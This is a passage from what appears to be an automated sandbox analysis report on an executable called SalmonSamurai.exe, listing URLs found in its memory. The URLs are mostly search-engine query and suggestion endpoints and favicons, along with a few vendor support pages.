Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://source.chromium.org/chromium/chromium/src/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sp.ask.com/sh/i/a16/favicon/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sp.ask.com/sh/i/a16/favicon/favicon.icohttps://www.ask.com/web?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.icohttps://search.naver.com/search.nav
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://storage.ape.yandex.net/get/browser/Doodles/yandex/drawable-xxhdpi/yandex.png
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suche.gmx.at/web/result?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suche.gmx.net/web/result?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sug.so.360.cn/suggest?encodein=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sugg.sogou.com/sugg/ajaj_json.jsp?type=addrbar&key=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.search.daum.net/sushi/opensearch/pc?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.seznam.cz/fulltext_ff?phrase=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.seznam.sk/fulltext_ff?phrase=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.by/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.com.tr/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.com/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestion.baidu.com/su?wd=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.at/s?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.co.uk/s?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.com/s?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.es/s?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.fr/s?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.net/s?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggests.go.mail.ru/chrome?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/favicon.icohttps://th.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tr.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tr.search.yahoo.com/favicon.icohttps://tr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/favicon.icohttps://tw.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ve.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ve.search.yahoo.com/favicon.icohttps://ve.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ve.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ve.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://vn.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://vn.search.yahoo.com/favicon.icohttps://vn.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://vn.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://vn.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.amd.com/en/support/apu/amd-series-processors/amd-a8-series-apu-for-laptops/a8-5550m-rade
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ask.com/web?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.baidu.com/#ie=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.baidu.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.baidu.com/favicon.icohttps://www.baidu.com/#ie=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.delfi.lt/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.delfi.lt/favicon.icohttps://www.delfi.lt/paieska/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.delfi.lt/paieska/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecosia.org/newtab/(
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.givero.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.givero.com/favicon.icohttps://www.givero.com/search?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.givero.com/search?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.givero.com/suggest?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.info.com/serp?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.info.com/static/www.info.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.info.com/static/www.info.com/favicon.icohttps://www.info.com/serp?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.intel.com/content/www/us/en/download-center/home.html
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.nic.cz/odvr/
